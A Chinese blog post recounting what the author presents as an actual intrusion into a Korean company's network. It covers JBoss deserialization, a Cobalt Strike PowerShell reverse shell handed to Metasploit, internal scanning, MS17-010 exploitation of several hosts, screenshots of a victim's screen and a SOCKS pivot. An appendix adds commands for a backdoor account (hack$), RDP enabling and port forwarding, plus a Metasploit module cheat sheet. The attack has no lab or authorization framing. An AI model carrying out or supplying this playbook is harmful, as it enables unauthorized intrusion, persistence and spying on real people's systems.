Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >一次实战内网漫游

一次实战内网漫游

作者头像
重生信息安全
发布于 2020-04-26 09:31:56
发布于 2020-04-26 09:31:56
1.8K0
举报
文章被收录于专栏:重生信息安全重生信息安全

本人喜欢在各大群里吹牛X,突然看到有人问3389端口怎么转发,卧槽搞事情,连忙加上好友怕装X赶不上热乎,从此刻开始了一次内网漫游。

经过一番了解,是一台韩国主机存在JBOSS反序列化,内网主机端口映射到外网8080,掏出我的尘封已久的宝贝。

我喜欢使用Cobalt Strike来接收shell,因为有心跳不易断开连接,接下来利用powershell反弹shell。

生成powershell并执行。

OK接收到shell,接下来将shell外联到msf 。

host 填写 msf的ip port则为msf监听的端口。

msf设置监听。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 6666

run

cs进行联动。

msf接收到shell,并查看路由表。

route list #查看路由

run autoroute -s #添加一条去内网ip的路由

run autoroute -p # 查看路由

tcp扫描内网网段端口主机存活情况。

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.0.1/24

set threads 50

run

看到开放不少445,可以侦探下ms17-010.

这么多ms17,韩国人都不打补丁的吗?

use auxiliary/scanner/smb/smb_ms17_010 #探测ms17-010

set rhosts 192.168.0.1/24

set threads 50

run

打一波ms17-010,在另外多开一个msf窗口设置监听。

设置ms17-010exp进行攻击。

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/reverse_tcp

set lhost #接收ip

set lport #接收端口

set rhost #漏洞主机ip

run

另外一个在监听的msf接收到shell。

screenshot #截图

看一眼韩国人在干嘛,有点看不懂。

刚才扫描内网端口看到192.168.0.1有80端口,估计是个路由器我过去看看。

use auxiliary/server/socks4a

run

设置socks隧道代理

设置好可以利用proxychains 进行代理访问内网。

使用nmap扫描内网。

firefox浏览器使用代理打开即可访问内网web。

访问192.168.0.1发现是路由器设置页面无需密码即可访问。

内网才这么几台电脑??瞬间没什么兴趣了。

V**??还可以啦。

就到这里吧,ms17-010就可以给内网打完了,就不用什么smb弱口令扫描,ipc入侵,一堆弱口令扫描了,内网里没什么环境。

---------------------------------------------------------------------------

远程桌面(端口转发):

run getgui -e #开启远程桌面 run getgui -u hack$ -p 123.com # 添加用户

portfwd add -l 1111 -p 3389 -r 192.168.0.13//将192.135主机3389转发本机111

rdesktop -u 账号 -p 密码 本机ip:端口 // 远程连接

内网扫描模块:

1,端口扫描

auxiliary/scanner/portscan scanner/portscan/ack ACK防火墙扫描 scanner/portscan/ftpbounce FTP跳端口扫描 scanner/portscan/syn SYN端口扫描 scanner/portscan/tcp TCP端口扫描 scanner/portscan/xmas TCP"XMas"端口扫描

2,SMB扫描

auxiliary/scanner/smb/smb_enumusers smb枚举 auxiliary/scanner/smb/pipe_dcerpc_auditor 返回DCERPC信息 auxiliary/scanner/smb/smb2 扫描SMB2协议 auxiliary/scanner/smb/smb_enumshares 扫描smb共享文件 auxiliary/scanner/smb/smb_enumusers 枚举系统上的用户 auxiliary/scanner/smb/smb_login SMB登录 use windows/smb/psexec (通过md5值登录)SMB登录 auxiliary/scanner/smb/smb_lookupsid 扫描组的用户 auxiliary/scanner/smb/smb_version 扫描系统版本

3,mssql扫描(端口tcp1433udp1434)

admin/mssql/mssql_enum MSSQL枚举 admin/mssql/mssql_exec MSSQL执行命令 admin/mssql/mssql_sql MSSQL查询 scanner/mssql/mssql_login MSSQL登陆工具 scanner/mssql/mssql_ping 测试MSSQL的存在和信息

4,smtp扫描

auxiliary/scanner/smtp/smtp_enum smtp枚举 auxiliary/scanner/smtp/smtp_version 扫描smtp版本

5,ssh扫描

auxiliary/scanner/ssh/ssh_login ssh登录 auxiliary/scanner/ssh/ssh_login_pubkey ssh公共密钥认证登录 auxiliary/scanner/ssh/ssh_version 扫描ssh版本测试

6,telnet扫描

auxiliary/scanner/telnet/telnet_login telnet登录 auxiliary/scanner/telnet/telnet_version 扫描telnet版本

7,tftp扫描

auxiliary/scanner/tftp/tftpbrute 扫描tftp的文件

scanner/ftp/anonymous ftp版本扫描

auxiliary/scanner/discovery/arp_sweep ARP扫描

auxiliary/scanner/discovery/udp_probe 扫描UDP服务的主机 auxiliary/scanner/discovery/udp_sweep 检测常用的UDP服务 auxiliary/sniffer/psnuffle sniffer密码 scanner/snmp/community snmp扫描 scanner/vnc/vnc_none_auth vnc扫描无认证扫描

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-04-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 重生信息安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
记一次MSF综合应用内网渗透记录
Date/time:2013年,很久没写技术文章了,记得之前写过MSF的reverse、bind两种反弹方式在实战中的应用,这次来写一篇MSF综合应用到内网渗透的实战文章。
潇湘信安
2022/01/21
1.4K0
记一次MSF综合应用内网渗透记录
红蓝对抗 | 内网渗透实战技巧
本文章是关于内网方面渗透技巧的一个文章,用的环境是VulnStack1,VulnStack是红日安全团队出的一个内网渗透的靶机环境,感谢红日团队
天钧
2020/03/12
2K0
一次简单的内网渗透靶场练习
当开启general log为on时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。所以为了get shell,我们将general log设为on,将general log file设为C:/phpStudy/WWW/test.php
HACK学习
2020/11/03
2.1K0
一次简单的内网渗透靶场练习
渗透测试 | 后渗透阶段之基于MSF的内网主机探测(存活、端口、服务)
当我们通过代理可以进入某内网,需要对内网主机的服务进行探测。我们就可以使用MSF里面的内网主机探测模块了。
谢公子
2022/01/13
4.1K0
渗透测试 | 后渗透阶段之基于MSF的内网主机探测(存活、端口、服务)
ATT&CK实战系统-红队实战(一)
很久之前放到收藏夹里的红日靶机,之前总想着汇总一下打一打,但是硬盘没有太大空间就没有去下载搭建(其实就是懒),最近写毕设的过程中无聊换换脑子来打一打。
用户2700375
2023/01/30
8170
ATT&CK实战系统-红队实战(一)
Metasploit 学习记录
一直在用 Metasploit,但是从来没有花时间仔细去研究这个工具,最近得空就系统的研究研究,故于此记录之。
小简
2023/01/04
2.3K0
Metasploit 学习记录
记一次糟心的内网靶场实战
菜鸡又来发表文章了,一开始的时候对整个内网的拓扑结构还不熟,所以做的时候很乱,写的也很乱。有很多方法都没有想到去用。qaq大佬们多多指教。
Power7089
2020/12/11
2.4K1
记一次糟心的内网靶场实战
小白入门学习内网之横向渗透攻击流程
这里有绝对路径的情况下,可直接写入webshell。这里使用sqlmap os-shell的功能
Power7089
2020/05/25
3.2K1
小白入门学习内网之横向渗透攻击流程
WEB安全基础 - - - Metasploit基础
       The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组 成,是全球最受欢迎的渗透测试工具之一 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试全过程,可以在这个框架下利用现有的 Payload 进行一系列的渗透测试
干掉芹菜
2022/11/19
7520
WEB安全基础 - - - Metasploit基础
浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
FB客服
2019/08/20
1.6K0
学习之详细说说MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
TRY博客-简单的网络技术
2022/07/18
1.7K0
学习之详细说说MSF渗透测试
内网靶场实战——ATT&CK实战系列(一)
靶场地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 下载过文件后,需配置如下两个虚拟网络(一个内网,一个外网)
用户9691112
2023/05/18
7490
内网靶场实战——ATT&CK实战系列(一)
Metasploit 服务扫描与爆破
发现HTTP服务: 基于scanner/http/http_version发现HTTP服务.
王瑞MVP
2022/12/28
9310
浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
顾翔
2019/12/12
1.1K0
浅谈MSF渗透测试
内网渗透-代理篇
利用代理工具将内网的流量代理到本地进行访问,这样就可以对内网进行下一步渗透,同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议),工作在OSI参考模型的第5层(会话层)。使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本:
Power7089
2021/05/27
5.1K0
记一次内网渗透靶场学习
首先nmap扫描一下端口发现了1433端口判断是sql server,另外一个特征端口就是7001端口,判断为weblogic端口
红队蓝军
2022/05/17
3340
记一次内网渗透靶场学习
Vulnstack1 - 内网部分
漏洞环境为ATT&CK实战系列——红队实战(一),主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。 环境 Kali:192.168.8.128,攻击机 Win7: Web服务器,192.168.8.129 域用户stu1.god.org,192.168.52.143 Win2003:域控制器owa.god.org,192.168.52.138 反弹Shell 攻击机制作木马文件,实际环境中需做免杀 $ ms
Naraku
2021/07/29
7780
Vulnstack1 - 内网部分
如何探测内网存活主机
在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。
Bypass
2020/09/25
3.9K0
内网靶场实战——ATT&CK实战系列(四)
环境 环境地址如下: http://39.98.79.56/vuln/detail/6/ 接下来下载好后在VmWare中进行ovf导入即可,共计三个文件 接下来配置网络环境,在虚拟网络编辑器中添加两个网段 1、192.168.1.0 NAT模式 用于外网 2、192.168.183.0 仅主机模式 用于内网 接下来给三个虚拟机以及攻击机(kali)进行分配 DC: VMet8(192.168.183.130) Web(Ubuntu): VMet4、VMet8(192.168.1.130、192.16
用户9691112
2023/05/18
8480
内网靶场实战——ATT&CK实战系列(四)
渗透测试的一些tips
团队小伙伴学习亮神文章的笔记,希望对大家有所帮助... 1、windows快速查找exp systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i
鸿鹄实验室
2021/04/15
5010
相关推荐
记一次MSF综合应用内网渗透记录
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档